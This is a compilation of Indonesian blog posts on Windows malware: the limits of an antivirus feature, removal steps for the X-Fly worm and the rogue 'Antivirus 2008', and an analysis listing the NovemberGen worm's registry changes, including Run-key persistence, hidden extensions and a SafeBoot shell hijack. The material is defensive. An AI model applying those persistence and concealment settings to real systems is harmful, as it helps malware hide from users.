c) Jika dalam Flash terdapat 2/3 jenis Virus yang menyerang,maka yang akan dikenali hanyalah jenis yang paling atraktif diantara mereka. Karena yang lainya dianggap penyerang pasif dan tidak punya exploiter / informasi tentang dirinya
d) Tidak mengenali unknown virus pada flash jika informasi tentang virus tsb telah corrupt alias dihapus software atau Antivirus lain, maka dahulukan Scan dengan Antivirus yang dilengkapi ArrS ( KAv S.E 2 ) sebelum Scan dengan Antivirus lain
e) Tidak mengenali virus yang bersifat pasif ( dikarantina atau virus sebagai percobaan )yang tidak dijalankan pada computer atau tidak melakukan aktifitasnya sendiri
Hm..m.mm banyak juga kan kelemahanya,tapi kelemahan itu akan segera terkurangi jika factor – factor yang mempengaruhi ArrS diperbaiki.
Jika anda penasaran dengan kemampuan ArrS ini silahkan mencoba, dengan mendownload Antivirus KAV S.E 2 build.A, atau jika mungkin anda seorang Engineer Antivirus saya persilahkan untuk menambahkan ArrS / Teknik sejenis kedalam Engine AV anda ( jika Anda berkenaan ).
Untuk mendapatkan Kendal AV S.E 2 dan informasi lebih detail tentang penggunaan dan teknik ArrS, silahkan pergi ke blog sederhananya ? di
http:// www.kav2008.wordpress.com , cari halaman download atau postingnya

Selamat menikmati kemudahan Era Antivirus Lokal tak berbayar
diambil dari : www.virologi.info

Hajar X-Fly.Worm dengan Morphost.

Kali ini saya akan jelaskan bagaimana menghajar X-Fly dan mengusir X-Fly dari komputer jelekmu…

Tentunya pakai Morphost donks.



Ciri-ciri X-Fly.Worm gak perlu kujelasin lagi, soalnya saya dah pernah membahas analisa X-Fly di artikel yang lain. Silakan cari saja artikel saya itu di google atau di: http://www.morphostlab.co.nr



Kalo komputermu lagi kena worm ini dan kepengen worm ini minggat dari komputermu, ikuti saja langkah-langkah berikut:




  1. Hidupkan Morphostmu.


Banyak sekali proses dari virus ini, jadi ada kemungkinan kalo morphost gak bisa hidup. Kalo misalnya gak bisa hidup maka gak ada jalan lain deh....


Tapi terkadang ada yang bisa hidup tapi butuh waktu yang lama. Bahkan saat kita hidupkan morphost ada jenjang waktu sekitar 20 detik tidak terjadi apa-apa di komputer. Tapi setelah itu morphost baru muncul!





  1. Scan Komputermu.


Silakan scan komputermu dengan Morphost. Supaya X-Fly bisa terdetek morphost, gunakan database ke 18 ke atas. Muncul pertanyaan gimana kalo kita gak pake database ke 18?


Jawabannya gak masalah. Asalkan kita pintar menggunakan Morphost. (silakan baca artikel morphost lainnya tentang tehnik morphost)





  1. Hapus virus


Silakan hapus virus yang sudah terdeteksi oleh Morphost. Namun dari sekian banyak file, ada satu file yang tidak bisa dihapus! File tersebut adalah ”C:\windows\system32\Rcss.exe”


Supaya file itu bisa terhapus matikan / terminate dulu proses virus itu





  1. Matikan proses virus


Untuk mematikan proses virus, kamu gak bisa pake morphost task manager (soalnya udah kucoba dan gak bisa). Silakan pake task manager!





  1. Aktifkan Task Manager


Muncul pertanyaan. Task manager kan didisable oleh worm X-Fly? Ya tentu saja. Gunakan saja registry tweaker morphost atau registry tweaker apa saja yang bisa mengaktifkan task manager. Lalu matikan proses yang bernama “Rcss.exe”





  1. Perbaiki registry yang rusak


Silakan perbaiki registry yang sudah dirusak oleh X-Fly. Untuk mengetahui alamat registry apa saja yang sudah dirusak oleh X-fly, baca saja artikel saya mengenai analisa worm ini.

diambil dari : www.virologi.info

Ad-ware/Malware: Antivirus 2008

Ya, nama Ad-ware ini dapat menipu para pengguna komputer. Karena namanya, yaitu Antivirus 2008, Ad-ware ini akan terdengar seperti Antivirus asli. Apalagi bila anda melihat di Security Center. Ad-ware ini telah mengganti Security Center dengan Ad-ware ini. Dengan begitu, Security Center seakan menyuruh User untuk meregister Antivirus 2008. Ad-ware ini pun akan membuat Blue Screen palsu serta boot palsu. Kadang-kadang, ad-ware ini akan memperlihatkan "boot screen" palsunya dalam beberapa waktu, seakan komputer di-restart oleh suatu virus. Sialnya lagi, Ad-ware ini akan terus menerus memunculkan window "Virus Detected". Tentu saja ini akan sangat mengganggu. Baiklah, inilah cara penghapusan Manualnya (Manual Remove):

1. Pastikan Folder Option memperlihatkan semua file hidden & system

2. Buka Task Manager. Untuk shortcut lebih cepatnya, CTRL + SHIFT + ESC

3. Pada tab Processes, matikkan Proses-proses berikut ini:
- AntiVirus2008.exe
- AV2008.exe
- AntvrsInstall.exe
- AntvrsInstall[1].exe
- Antvrs.exe

4. Gunakan fitur "Find" atau "Search" pada Windows. Cari dan hapus file-file berikut ini:
- AntiVirus2008.exe
- AntvrsInstall.exe
- AntvrsInstall[1].exe
- Antvrs.exe
- AV2008.exe
- AntiVirus2008.exe
- AntiVirus2008.lnk
- Uninstall AntiVirus2008.lnk

5. Klik Start > Run atau Shortcutnya yaitu CTRL + R untuk membuka window "Run"

6. Ketikkan 'regedit' (tanpa tanda petik) pada window "Run"

7. Hapus Registry - registry berikut ini:
- HKEY_CURRENT_USER\Software\Antivirus
- HKEY_LOCAL_MACHINE\SOFTWARE\Antivirus
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion \Uninstall\AntiVirus2008

8. Untuk penghapusan lebih lanjut, silahkan unduh Malware Bytes di http://malwarebytes.org

9. Scan komputer anda dengan Malware Bytes

10. Hapus semua Malware yang terdeteksi

11. Selesai....
diambil dari : www.virologi.info

Analisa NovemberGen.svchost

(BACA: Hasil analisa berikut tidak sepenuhnya benar, mungkin saja saya salah menganalisa!)


Hasil Analisa


Nama Malware : NovemberGen.Scvhost.Worm [Morphost], Trojan-Downloader.Win32.VB.inz [Kaspersky Lab]


Ukuran : 337,466 bytes


Pengirim Virus : D3mon


Icon : regedit.


CRC32 : A369C91A (berdasarkan file yang dikirim)


MD5 : DD7132C1F4F317115C4979607B37EC4A (berdasarkan file yang dikirim)


Dibuat dengan : Visual Basic



Lokasi Project Virus:


D:\Microsoft\Microsoft\windows\System.vbp



Di dalam tubuh virus terdapat resource yang berupa gambar seperti dibawah ini:


image003



===============================================================



[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]


NeverShowExt = ""


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.Msd\Shell\Open\Command]


(Default) = "%1"


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.Msd\DefaultIcon]


(Default) = "%System%\rasphone.exe"


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.Msd]


(Default) = "Microsoft System Direct"


NeverShowExt = ""


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sysm\Shell\Open\Command]


(Default) = "%1"


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sysm\DefaultIcon]


(Default) = "%System%\netsetup.exe"


[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.sysm]


(Default) = "System Mechanic"


NeverShowExt = ""


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]


VisualStyle = "%System%\Desktop.sysm"


[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]


regtweak = "regtweak.exe"


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\ShowFullPath]


DefaultValue = 0x00000001


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]


CheckedValue = 0x00000001


DefaultValue = 0x00000001


[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot]


AlternateShell = "%System%\CommandPrompt.Sysm"


[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot]


AlternateShell = "%System%\CommandPrompt.Sysm"


[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]


AlternateShell = "%System%\CommandPrompt.Sysm"



Kalau ada penyerangan lainnya silakan beritahu saya.


Signature worm ini sudah saya masukkan ke dalam database Morphost yang ke 17.

diambil dari : www.virologi.info